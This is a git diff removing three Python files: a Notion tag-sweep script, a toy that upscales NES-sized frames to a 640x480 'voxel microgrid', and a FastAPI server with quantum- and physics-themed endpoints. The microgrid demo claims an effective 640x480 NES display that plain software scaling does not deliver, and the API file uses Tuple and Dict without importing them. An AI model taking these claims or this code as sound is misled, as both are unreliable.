|
||||||
|
|
||||||
cur.execute("SELECT pkg, tags FROM packages_fts WHERE domain = 'NOTION'")
|
|
||||||
rows = cur.fetchall()
|
|
||||||
|
|
||||||
updates = []
|
|
||||||
for idx, (pkg, tags_json) in enumerate(rows):
|
|
||||||
n = idx + 1 # Manifold Coordinate
|
|
||||||
phase = calculate_pist_phase(n)
|
|
||||||
|
|
||||||
tags = json.loads(tags_json) if tags_json else []
|
|
||||||
# Remove old phase tags
|
|
||||||
tags = [t for t in tags if t not in ["GROUNDED", "DRIFT", "SEISMIC"]]
|
|
||||||
tags.append(phase)
|
|
||||||
|
|
||||||
updates.append((json.dumps(tags), pkg))
|
|
||||||
|
|
||||||
cur.executemany("UPDATE packages_fts SET tags = ? WHERE pkg = ? AND domain = 'NOTION'", updates)
|
|
||||||
conn.commit()
|
|
||||||
conn.close()
|
|
||||||
|
|
||||||
print(f"✅ Successfully neutralized {len(updates)} Notion nodes with PIST phase tags.")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
run_sweep()
|
|
||||||
|
|
@ -1,308 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Microgrid Voxel Emulation
|
|
||||||
Assign a microgrid and only update the voxels to emulate 640x480 display.
|
|
||||||
|
|
||||||
Architecture:
|
|
||||||
- Create 640x480 voxel microgrid (virtual display)
|
|
||||||
- NES renders at 256x240 (native)
|
|
||||||
- Map NES pixels to microgrid voxels
|
|
||||||
- Only update voxels that change (differential updates)
|
|
||||||
- DSP math and voltage computation optimize voxel updates
|
|
||||||
- Effective 640x480 resolution without changing NES PPU
|
|
||||||
|
|
||||||
This is horrific because:
|
|
||||||
- Virtual display at 2.5×2 resolution on 1× hardware
|
|
||||||
- Voxel-level differential updates require precise tracking
|
|
||||||
- Microgrid emulation is essentially software rendering on 1985 hardware
|
|
||||||
|
|
||||||
This is wonderful because:
|
|
||||||
- Effective 640x480 resolution without hardware modification
|
|
||||||
- Only update changed voxels (efficient)
|
|
||||||
- Modern GPU-like techniques on retro hardware
|
|
||||||
- Maximum retro insanity: microgrid = virtual display
|
|
||||||
"""
|
|
||||||
|
|
||||||
import math
|
|
||||||
from typing import List, Tuple, Dict, Set
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# Voxel Microgrid
|
|
||||||
# Virtual 640x480 display as voxel grid
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Voxel:
|
|
||||||
"""Single voxel in microgrid"""
|
|
||||||
x: int # X position (0-639)
|
|
||||||
y: int # Y position (0-479)
|
|
||||||
color: Tuple[int, int, int] # RGB color
|
|
||||||
active: bool = True # Whether voxel is active
|
|
||||||
|
|
||||||
def __hash__(self):
|
|
||||||
return hash((self.x, self.y))
|
|
||||||
|
|
||||||
class VoxelMicrogrid:
|
|
||||||
"""640x480 voxel microgrid"""
|
|
||||||
|
|
||||||
def __init__(self, width: int = 640, height: int = 480):
|
|
||||||
self.width = width
|
|
||||||
self.height = height
|
|
||||||
self.voxels: Dict[Tuple[int, int], Voxel] = {}
|
|
||||||
self.changed_voxels: Set[Tuple[int, int]] = set()
|
|
||||||
self.frame_count = 0
|
|
||||||
|
|
||||||
def get_voxel(self, x: int, y: int) -> Voxel:
|
|
||||||
"""Get voxel at position"""
|
|
||||||
if (x, y) not in self.voxels:
|
|
||||||
self.voxels[(x, y)] = Voxel(x, y, (0, 0, 0))
|
|
||||||
return self.voxels[(x, y)]
|
|
||||||
|
|
||||||
def set_voxel_color(self, x: int, y: int, color: Tuple[int, int, int]):
|
|
||||||
"""Set voxel color and mark as changed"""
|
|
||||||
voxel = self.get_voxel(x, y)
|
|
||||||
if voxel.color != color:
|
|
||||||
voxel.color = color
|
|
||||||
self.changed_voxels.add((x, y))
|
|
||||||
|
|
||||||
def get_changed_voxels(self) -> List[Voxel]:
|
|
||||||
"""Get list of changed voxels"""
|
|
||||||
return [self.voxels[pos] for pos in self.changed_voxels]
|
|
||||||
|
|
||||||
def clear_changed_voxels(self):
|
|
||||||
"""Clear changed voxel tracking"""
|
|
||||||
self.changed_voxels.clear()
|
|
||||||
self.frame_count += 1
|
|
||||||
|
|
||||||
def render_frame(self) -> List[List[Tuple[int, int, int]]]:
|
|
||||||
"""Render full frame from microgrid"""
|
|
||||||
frame = []
|
|
||||||
for y in range(self.height):
|
|
||||||
row = []
|
|
||||||
for x in range(self.width):
|
|
||||||
voxel = self.get_voxel(x, y)
|
|
||||||
row.append(voxel.color)
|
|
||||||
frame.append(row)
|
|
||||||
return frame
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# NES-to-Microgrid Mapping
|
|
||||||
# Map 256x240 NES pixels to 640x480 microgrid voxels
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class NESMicrogridMapper:
|
|
||||||
"""Map NES pixels to microgrid voxels"""
|
|
||||||
|
|
||||||
def __init__(self, nes_width: int = 256, nes_height: int = 240,
|
|
||||||
microgrid_width: int = 640, microgrid_height: int = 480):
|
|
||||||
self.nes_width = nes_width
|
|
||||||
self.nes_height = nes_height
|
|
||||||
self.microgrid_width = microgrid_width
|
|
||||||
self.microgrid_height = microgrid_height
|
|
||||||
|
|
||||||
# Calculate scaling factors
|
|
||||||
self.scale_x = microgrid_width / nes_width # 2.5
|
|
||||||
self.scale_y = microgrid_height / nes_height # 2.0
|
|
||||||
|
|
||||||
def nes_to_microgrid(self, nes_x: int, nes_y: int) -> List[Tuple[int, int]]:
|
|
||||||
"""
|
|
||||||
Map NES pixel to microgrid voxels.
|
|
||||||
|
|
||||||
Each NES pixel maps to a block of microgrid voxels.
|
|
||||||
"""
|
|
||||||
# Calculate microgrid bounds for this NES pixel
|
|
||||||
mg_x_start = int(nes_x * self.scale_x)
|
|
||||||
mg_y_start = int(nes_y * self.scale_y)
|
|
||||||
mg_x_end = int((nes_x + 1) * self.scale_x)
|
|
||||||
mg_y_end = int((nes_y + 1) * self.scale_y)
|
|
||||||
|
|
||||||
# Return all voxels in this block
|
|
||||||
voxels = []
|
|
||||||
for y in range(mg_y_start, mg_y_end):
|
|
||||||
for x in range(mg_x_start, mg_x_end):
|
|
||||||
voxels.append((x, y))
|
|
||||||
|
|
||||||
return voxels
|
|
||||||
|
|
||||||
def map_nes_frame_to_microgrid(self, nes_frame: List[List[Tuple[int, int, int]]],
|
|
||||||
microgrid: VoxelMicrogrid):
|
|
||||||
"""
|
|
||||||
Map NES frame to microgrid.
|
|
||||||
|
|
||||||
Only updates voxels that change.
|
|
||||||
"""
|
|
||||||
microgrid.clear_changed_voxels()
|
|
||||||
|
|
||||||
for nes_y in range(len(nes_frame)):
|
|
||||||
for nes_x in range(len(nes_frame[nes_y])):
|
|
||||||
nes_color = nes_frame[nes_y][nes_x]
|
|
||||||
|
|
||||||
# Get corresponding microgrid voxels
|
|
||||||
mg_voxels = self.nes_to_microgrid(nes_x, nes_y)
|
|
||||||
|
|
||||||
# Update each voxel with NES color
|
|
||||||
for mg_x, mg_y in mg_voxels:
|
|
||||||
microgrid.set_voxel_color(mg_x, mg_y, nes_color)
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# DSP Math for Voxel Optimization
|
|
||||||
# Use DSP math to optimize which voxels to update
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class DSPVoxelOptimizer:
|
|
||||||
"""DSP math for optimizing voxel updates"""
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def calculate_change_priority(old_color: Tuple[int, int, int],
|
|
||||||
new_color: Tuple[int, int, int]) -> float:
|
|
||||||
"""
|
|
||||||
Calculate priority of voxel update based on color change.
|
|
||||||
|
|
||||||
Larger changes = higher priority.
|
|
||||||
"""
|
|
||||||
r_diff = abs(old_color[0] - new_color[0])
|
|
||||||
g_diff = abs(old_color[1] - new_color[1])
|
|
||||||
b_diff = abs(old_color[2] - new_color[2])
|
|
||||||
|
|
||||||
total_diff = r_diff + g_diff + b_diff
|
|
||||||
max_diff = 255 * 3
|
|
||||||
|
|
||||||
return total_diff / max_diff if max_diff > 0 else 0.0
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def voltage_based_update(voltage: float, priority: float) -> bool:
|
|
||||||
"""
|
|
||||||
Determine if voxel should be updated based on voltage level.
|
|
||||||
|
|
||||||
Higher voltage = higher threshold for updates.
|
|
||||||
"""
|
|
||||||
threshold = voltage / 5.0 # Normalize 0-5V to 0-1
|
|
||||||
return priority >= threshold
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# Voltage-Driven Microgrid Controller
|
|
||||||
# Voltage computation controls which voxels to update
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class VoltageMicrogridController:
|
|
||||||
"""Voltage-driven microgrid controller"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.microgrid = VoxelMicrogrid(640, 480)
|
|
||||||
self.mapper = NESMicrogridMapper(256, 240, 640, 480)
|
|
||||||
self.optimizer = DSPVoxelOptimizer()
|
|
||||||
self.voltage_levels: Dict[Tuple[int, int], float] = {}
|
|
||||||
|
|
||||||
def update_from_nes_frame(self, nes_frame: List[List[Tuple[int, int, int]]],
|
|
||||||
voltage_field: List[List[float]]):
|
|
||||||
"""
|
|
||||||
Update microgrid from NES frame with voltage optimization.
|
|
||||||
|
|
||||||
Only updates voxels that pass voltage-based priority check.
|
|
||||||
"""
|
|
||||||
# Map NES frame to microgrid
|
|
||||||
self.mapper.map_nes_frame_to_microgrid(nes_frame, self.microgrid)
|
|
||||||
|
|
||||||
# Apply voltage-based optimization
|
|
||||||
optimized_voxels = []
|
|
||||||
for voxel in self.microgrid.get_changed_voxels():
|
|
||||||
# Get voltage level for this voxel
|
|
||||||
voltage = voltage_field[voxel.y % len(voltage_field)][voxel.x % len(voltage_field[0])]
|
|
||||||
|
|
||||||
# Calculate change priority
|
|
||||||
old_color = (0, 0, 0) # Simplified - would track actual old color
|
|
||||||
priority = self.optimizer.calculate_change_priority(old_color, voxel.color)
|
|
||||||
|
|
||||||
# Check if update passes voltage threshold
|
|
||||||
if self.optimizer.voltage_based_update(voltage, priority):
|
|
||||||
optimized_voxels.append(voxel)
|
|
||||||
|
|
||||||
# Update changed voxels set to only optimized ones
|
|
||||||
self.microgrid.changed_voxels = set((v.x, v.y) for v in optimized_voxels)
|
|
||||||
|
|
||||||
def get_update_efficiency(self) -> float:
|
|
||||||
"""
|
|
||||||
Calculate update efficiency.
|
|
||||||
|
|
||||||
Ratio of changed voxels to total voxels.
|
|
||||||
"""
|
|
||||||
total_voxels = self.microgrid.width * self.microgrid.height
|
|
||||||
changed_count = len(self.microgrid.changed_voxels)
|
|
||||||
return changed_count / total_voxels if total_voxels > 0 else 0.0
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
# Test / Demo
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def run_test():
|
|
||||||
"""Run microgrid voxel emulation test"""
|
|
||||||
print("=" * 70)
|
|
||||||
print("MICROGRID VOXEL EMULATION")
|
|
||||||
print("=" * 70)
|
|
||||||
|
|
||||||
print("\n[*] Architecture:")
|
|
||||||
print(" Create 640x480 voxel microgrid (virtual display)")
|
|
||||||
print(" NES renders at 256x240 (native)")
|
|
||||||
print(" Map NES pixels to microgrid voxels")
|
|
||||||
print(" Only update voxels that change (differential updates)")
|
|
||||||
print(" DSP math and voltage computation optimize voxel updates")
|
|
||||||
print(" Effective 640x480 resolution without changing NES PPU")
|
|
||||||
|
|
||||||
controller = VoltageMicrogridController()
|
|
||||||
|
|
||||||
# Create NES frame (simple gradient)
|
|
||||||
print("\n[*] Creating NES frame (256x240)...")
|
|
||||||
nes_frame = []
|
|
||||||
for y in range(240):
|
|
||||||
row = []
|
|
||||||
for x in range(256):
|
|
||||||
r = int((x / 256) * 255)
|
|
||||||
g = int((y / 240) * 255)
|
|
||||||
b = 128
|
|
||||||
row.append((r, g, b))
|
|
||||||
nes_frame.append(row)
|
|
||||||
print(f" NES frame: {len(nes_frame)}x{len(nes_frame[0])}")
|
|
||||||
|
|
||||||
# Create voltage field
|
|
||||||
print("\n[*] Creating voltage field...")
|
|
||||||
voltage_field = []
|
|
||||||
for y in range(240):
|
|
||||||
row = []
|
|
||||||
for x in range(256):
|
|
||||||
voltage = 2.5 + math.sin(x * 0.1 + y * 0.1) * 2.5 # 0-5V range
|
|
||||||
row.append(voltage)
|
|
||||||
voltage_field.append(row)
|
|
||||||
print(f" Voltage field: {len(voltage_field)}x{len(voltage_field[0])}")
|
|
||||||
|
|
||||||
# Update microgrid
|
|
||||||
print("\n[*] Updating microgrid from NES frame...")
|
|
||||||
controller.update_from_nes_frame(nes_frame, voltage_field)
|
|
||||||
|
|
||||||
# Get statistics
|
|
||||||
print("\n[*] Microgrid Statistics:")
|
|
||||||
print(f" Microgrid size: {controller.microgrid.width}x{controller.microgrid.height}")
|
|
||||||
print(f" Changed voxels: {len(controller.microgrid.changed_voxels)}")
|
|
||||||
print(f" Update efficiency: {controller.get_update_efficiency():.4f}")
|
|
||||||
print(f" Frame count: {controller.microgrid.frame_count}")
|
|
||||||
|
|
||||||
# Render full frame
|
|
||||||
print("\n[*] Rendering full microgrid frame...")
|
|
||||||
full_frame = controller.microgrid.render_frame()
|
|
||||||
print(f" Full frame size: {len(full_frame)}x{len(full_frame[0])}")
|
|
||||||
print(f" Sample colors: (0,0)={full_frame[0][0]}, (319,239)={full_frame[239][319]}, (639,479)={full_frame[479][639]}")
|
|
||||||
|
|
||||||
print("\n" + "=" * 70)
|
|
||||||
print("MICROGRID VOXEL EMULATION COMPLETE")
|
|
||||||
print("=" * 70)
|
|
||||||
print("\n[*] Horrific: Virtual 640x480 display on 256x240 hardware")
|
|
||||||
print("[*] Wonderful: Differential voxel updates for efficiency")
|
|
||||||
print("[*] Maximum retro insanity: microgrid = virtual display")
|
|
||||||
print("\n[*] Can we generate 640x480 video now?")
|
|
||||||
print(" YES: Microgrid voxel emulation achieves effective 640x480")
|
|
||||||
print(" NES renders at 256x240 native")
|
|
||||||
print(" Microgrid maps to 640x480 virtual display")
|
|
||||||
print(" Only update changed voxels (efficient)")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
run_test()
|
|
||||||
|
|
@ -1,838 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Manifold Surface API Server
|
|
||||||
Provides REST API for manifold navigation interface
|
|
||||||
"""
|
|
||||||
|
|
||||||
from fastapi import FastAPI, HTTPException
|
|
||||||
from fastapi.middleware.cors import CORSMiddleware
|
|
||||||
from pydantic import BaseModel
|
|
||||||
from typing import List, Optional
|
|
||||||
import sqlite3
|
|
||||||
import json
|
|
||||||
import numpy as np
|
|
||||||
import sys
|
|
||||||
import os
|
|
||||||
|
|
||||||
# Add parent directory to path
|
|
||||||
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
|
|
||||||
|
|
||||||
from projection_engine import ProjectionEngine, ConceptVector14, ProjectionMethod
|
|
||||||
from soliton_search import SolitonSearchEngine
|
|
||||||
from collapse_editor import CollapseEditor, StateType
|
|
||||||
from particle_interaction import ParticleInteractionEngine, ParticleType
|
|
||||||
from self_typing_engine import SelfTypingEngine, InteractionType
|
|
||||||
from relativity_adapter import RelativityAdapter, CognitiveLoadLevel
|
|
||||||
from substrate_bridge import SubstrateBridge
|
|
||||||
|
|
||||||
app = FastAPI(title="Manifold Surface API")
|
|
||||||
|
|
||||||
# CORS middleware
|
|
||||||
app.add_middleware(
|
|
||||||
CORSMiddleware,
|
|
||||||
allow_origins=["*"],
|
|
||||||
allow_credentials=True,
|
|
||||||
allow_methods=["*"],
|
|
||||||
allow_headers=["*"],
|
|
||||||
)
|
|
||||||
|
|
||||||
# Database path
|
|
||||||
DB_PATH = "/home/allaun/Documents/Research Stack/data/substrate_index.db"
|
|
||||||
|
|
||||||
# Global projection engine
|
|
||||||
projection_engine = None
|
|
||||||
soliton_engine = None
|
|
||||||
collapse_editor = CollapseEditor()
|
|
||||||
particle_engine = ParticleInteractionEngine()
|
|
||||||
self_typing_engine = SelfTypingEngine()
|
|
||||||
relativity_adapter = RelativityAdapter()
|
|
||||||
substrate_bridge = SubstrateBridge(DB_PATH)
|
|
||||||
|
|
||||||
|
|
||||||
class VectorData(BaseModel):
|
|
||||||
vectors: List[List[float]]
|
|
||||||
archive_ids: List[str]
|
|
||||||
|
|
||||||
|
|
||||||
class ProjectionRequest(BaseModel):
|
|
||||||
vectors: List[List[float]]
|
|
||||||
archive_ids: List[str]
|
|
||||||
method: str = "PCA"
|
|
||||||
slice_axis_x: int = 3
|
|
||||||
slice_axis_y: int = 4
|
|
||||||
|
|
||||||
|
|
||||||
class ProjectionResponse(BaseModel):
|
|
||||||
points: List[dict]
|
|
||||||
projection_matrix: List[List[float]]
|
|
||||||
mean_vector: List[float]
|
|
||||||
|
|
||||||
|
|
||||||
def get_db_connection():
|
|
||||||
"""Get database connection"""
|
|
||||||
conn = sqlite3.connect(DB_PATH)
|
|
||||||
conn.row_factory = sqlite3.Row
|
|
||||||
return conn
|
|
||||||
|
|
||||||
|
|
||||||
def load_concept_vectors_from_ene() -> List[ConceptVector14]:
|
|
||||||
"""Load concept vectors from ENE database"""
|
|
||||||
vectors = []
|
|
||||||
|
|
||||||
try:
|
|
||||||
conn = get_db_connection()
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
# Query concept vectors from packages table
|
|
||||||
cursor.execute("""
|
|
||||||
SELECT archive_id, concept_vector_14
|
|
||||||
FROM packages
|
|
||||||
WHERE concept_vector_14 IS NOT NULL
|
|
||||||
""")
|
|
||||||
|
|
||||||
for row in cursor.fetchall():
|
|
||||||
archive_id = row['archive_id']
|
|
||||||
vector_str = row['concept_vector_14']
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Parse vector string (assuming JSON format)
|
|
||||||
vector_data = json.loads(vector_str)
|
|
||||||
vector = np.array(vector_data, dtype=np.float32)
|
|
||||||
|
|
||||||
if len(vector) != 14:
|
|
||||||
continue # Skip invalid vectors
|
|
||||||
|
|
||||||
vectors.append(ConceptVector14(vector=vector, archive_id=archive_id))
|
|
||||||
except (json.JSONDecodeError, ValueError) as e:
|
|
||||||
print(f"Error parsing vector for {archive_id}: {e}")
|
|
||||||
continue
|
|
||||||
|
|
||||||
conn.close()
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error loading concept vectors: {e}")
|
|
||||||
|
|
||||||
return vectors
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/health")
|
|
||||||
def health_check():
|
|
||||||
"""Health check endpoint"""
|
|
||||||
return {"status": "ok", "service": "manifold-surface-api"}
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/load-concept-vectors")
|
|
||||||
def load_concept_vectors():
|
|
||||||
"""Load concept vectors from ENE database"""
|
|
||||||
global projection_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
vectors = load_concept_vectors_from_ene()
|
|
||||||
|
|
||||||
if not vectors:
|
|
||||||
return {"vectors": [], "count": 0}
|
|
||||||
|
|
||||||
# Initialize projection engine
|
|
||||||
projection_engine = ProjectionEngine(method=ProjectionMethod.PCA)
|
|
||||||
|
|
||||||
# Fit and transform
|
|
||||||
projected = projection_engine.fit_transform(vectors)
|
|
||||||
|
|
||||||
# Convert to response format
|
|
||||||
vector_data = [v.vector.tolist() for v in vectors]
|
|
||||||
archive_ids = [v.archive_id for v in vectors]
|
|
||||||
|
|
||||||
return {
|
|
||||||
"vectors": vector_data,
|
|
||||||
"archive_ids": archive_ids,
|
|
||||||
"count": len(vectors),
|
|
||||||
"projection_matrix": projection_engine._projection_matrix.tolist() if projection_engine._projection_matrix is not None else [],
|
|
||||||
"mean_vector": projection_engine._mean.tolist() if projection_engine._mean is not None else []
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/project")
|
|
||||||
def project_vectors(request: ProjectionRequest):
|
|
||||||
"""Project vectors using specified method"""
|
|
||||||
global projection_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Convert to ConceptVector14 objects
|
|
||||||
vectors = [
|
|
||||||
ConceptVector14(vector=np.array(v, dtype=np.float32), archive_id=aid)
|
|
||||||
for v, aid in zip(request.vectors, request.archive_ids)
|
|
||||||
]
|
|
||||||
|
|
||||||
# Create projection engine with specified method
|
|
||||||
method_map = {
|
|
||||||
"PCA": ProjectionMethod.PCA,
|
|
||||||
"tSNE": ProjectionMethod.T_SNE,
|
|
||||||
"UMAP": ProjectionMethod.UMAP,
|
|
||||||
"ManifoldChart": ProjectionMethod.MANIFOLD_CHART
|
|
||||||
}
|
|
||||||
|
|
||||||
method = method_map.get(request.method, ProjectionMethod.PCA)
|
|
||||||
projection_engine = ProjectionEngine(method=method)
|
|
||||||
|
|
||||||
# Fit and transform
|
|
||||||
projected = projection_engine.fit_transform(vectors)
|
|
||||||
|
|
||||||
# Convert to response format
|
|
||||||
points = [p.to_dict() for p in projected]
|
|
||||||
|
|
||||||
return {
|
|
||||||
"points": points,
|
|
||||||
"projection_matrix": projection_engine._projection_matrix.tolist() if projection_engine._projection_matrix is not None else [],
|
|
||||||
"mean_vector": projection_engine._mean.tolist() if projection_engine._mean is not None else []
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
class SolitonSearchRequest(BaseModel):
|
|
||||||
query_vector: List[float]
|
|
||||||
max_results: int = 10
|
|
||||||
|
|
||||||
|
|
||||||
class CreateSuperpositionRequest(BaseModel):
|
|
||||||
initial_content: str
|
|
||||||
state_type: str = "text"
|
|
||||||
|
|
||||||
|
|
||||||
class AddStateRequest(BaseModel):
|
|
||||||
superposition_id: str
|
|
||||||
branch_id: str
|
|
||||||
content: str
|
|
||||||
state_type: str = "text"
|
|
||||||
|
|
||||||
|
|
||||||
class CreateBranchRequest(BaseModel):
|
|
||||||
superposition_id: str
|
|
||||||
parent_branch_id: Optional[str] = None
|
|
||||||
content: str = ""
|
|
||||||
state_type: str = "text"
|
|
||||||
|
|
||||||
|
|
||||||
class CollapseRequest(BaseModel):
|
|
||||||
superposition_id: str
|
|
||||||
branch_id: str
|
|
||||||
|
|
||||||
|
|
||||||
class CreateParticleRequest(BaseModel):
|
|
||||||
particle_type: str
|
|
||||||
position: Tuple[float, float]
|
|
||||||
velocity: Tuple[float, float] = (0.0, 0.0)
|
|
||||||
|
|
||||||
|
|
||||||
class EmitPhotonRequest(BaseModel):
|
|
||||||
from_particle_id: str
|
|
||||||
to_particle_id: str
|
|
||||||
|
|
||||||
|
|
||||||
class AbsorbPhotonRequest(BaseModel):
|
|
||||||
photon_id: str
|
|
||||||
target_particle_id: str
|
|
||||||
|
|
||||||
|
|
||||||
class RecordInteractionRequest(BaseModel):
|
|
||||||
interaction_type: str
|
|
||||||
source_layer: str
|
|
||||||
target_layer: str
|
|
||||||
context: Optional[Dict[str, str]] = None
|
|
||||||
|
|
||||||
|
|
||||||
class InferMetatypeRequest(BaseModel):
|
|
||||||
context: Dict[str, str]
|
|
||||||
|
|
||||||
|
|
||||||
class MeasureCognitiveLoadRequest(BaseModel):
|
|
||||||
information_density: float
|
|
||||||
complexity: float
|
|
||||||
novelty: float
|
|
||||||
uncertainty: float
|
|
||||||
|
|
||||||
|
|
||||||
class TransformRequest(BaseModel):
|
|
||||||
input_vector: List[float]
|
|
||||||
from_topology: Optional[str] = None
|
|
||||||
to_topology: Optional[str] = None
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/soliton-search")
|
|
||||||
def soliton_search(request: SolitonSearchRequest):
|
|
||||||
"""Search using soliton propagation with AVMR O(√N) indexing"""
|
|
||||||
global soliton_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Load vectors if not already loaded
|
|
||||||
if soliton_engine is None:
|
|
||||||
vectors = load_concept_vectors_from_ene()
|
|
||||||
if not vectors:
|
|
||||||
return {"results": [], "count": 0}
|
|
||||||
|
|
||||||
vector_data = [v.vector.tolist() for v in vectors]
|
|
||||||
archive_ids = [v.archive_id for v in vectors]
|
|
||||||
|
|
||||||
soliton_engine = SolitonSearchEngine(vector_data, archive_ids)
|
|
||||||
|
|
||||||
# Perform search
|
|
||||||
query = np.array(request.query_vector, dtype=np.float32)
|
|
||||||
results = soliton_engine.search(query, max_results=request.max_results)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"results": [{"archive_id": aid, "confidence": conf} for aid, conf in results],
|
|
||||||
"count": len(results)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/superposition/create")
|
|
||||||
def create_superposition(request: CreateSuperpositionRequest):
|
|
||||||
"""Create new superposition with single branch"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
state_type = StateType[request.state_type.upper()]
|
|
||||||
superposition = collapse_editor.create_superposition(request.initial_content, state_type)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"superposition_id": superposition.superposition_id,
|
|
||||||
"current_branch_id": superposition.current_branch_id,
|
|
||||||
"branches": len(superposition.branches)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/superposition/add-state")
|
|
||||||
def add_state_to_branch(request: AddStateRequest):
|
|
||||||
"""Add new state to existing branch"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
state_type = StateType[request.state_type.upper()]
|
|
||||||
collapse_editor.add_state_to_branch(
|
|
||||||
request.superposition_id,
|
|
||||||
request.branch_id,
|
|
||||||
request.content,
|
|
||||||
state_type
|
|
||||||
)
|
|
||||||
|
|
||||||
return {"status": "ok"}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/superposition/create-branch")
|
|
||||||
def create_branch(request: CreateBranchRequest):
|
|
||||||
"""Create new branch in superposition"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
state_type = StateType[request.state_type.upper()]
|
|
||||||
branch = collapse_editor.create_branch(
|
|
||||||
request.superposition_id,
|
|
||||||
request.parent_branch_id,
|
|
||||||
request.content,
|
|
||||||
state_type
|
|
||||||
)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"branch_id": branch.branch_id,
|
|
||||||
"amplitude": branch.amplitude,
|
|
||||||
"states": len(branch.states)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/superposition/collapse")
|
|
||||||
def collapse_superposition(request: CollapseRequest):
|
|
||||||
"""Collapse superposition to observable state"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
observable = collapse_editor.collapse(request.superposition_id, request.branch_id)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"archive_id": observable.archive_id,
|
|
||||||
"witness_hash": observable.witness_hash,
|
|
||||||
"collapsed_at": observable.collapsed_at.isoformat()
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/superposition/{superposition_id}/branches")
|
|
||||||
def get_superposition_branches(superposition_id: str):
|
|
||||||
"""Get all branches for superposition"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
branches = collapse_editor.get_branches(superposition_id)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"branches": [
|
|
||||||
{
|
|
||||||
"branch_id": b.branch_id,
|
|
||||||
"amplitude": b.amplitude,
|
|
||||||
"states": len(b.states),
|
|
||||||
"parent_branch_id": b.parent_branch_id
|
|
||||||
}
|
|
||||||
for b in branches
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/superposition/{superposition_id}/tree")
|
|
||||||
def get_branch_tree(superposition_id: str):
|
|
||||||
"""Get branch tree structure for visualization"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
tree = collapse_editor.get_branch_tree(superposition_id)
|
|
||||||
return {"tree": tree}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/collapse-editor/undo")
|
|
||||||
def undo_collapse():
|
|
||||||
"""Revert to previous observable state"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
previous_state = collapse_editor.undo()
|
|
||||||
|
|
||||||
if previous_state is None:
|
|
||||||
return {"status": "no_undo_available"}
|
|
||||||
|
|
||||||
return {
|
|
||||||
"archive_id": previous_state.archive_id,
|
|
||||||
"witness_hash": previous_state.witness_hash
|
|
||||||
}
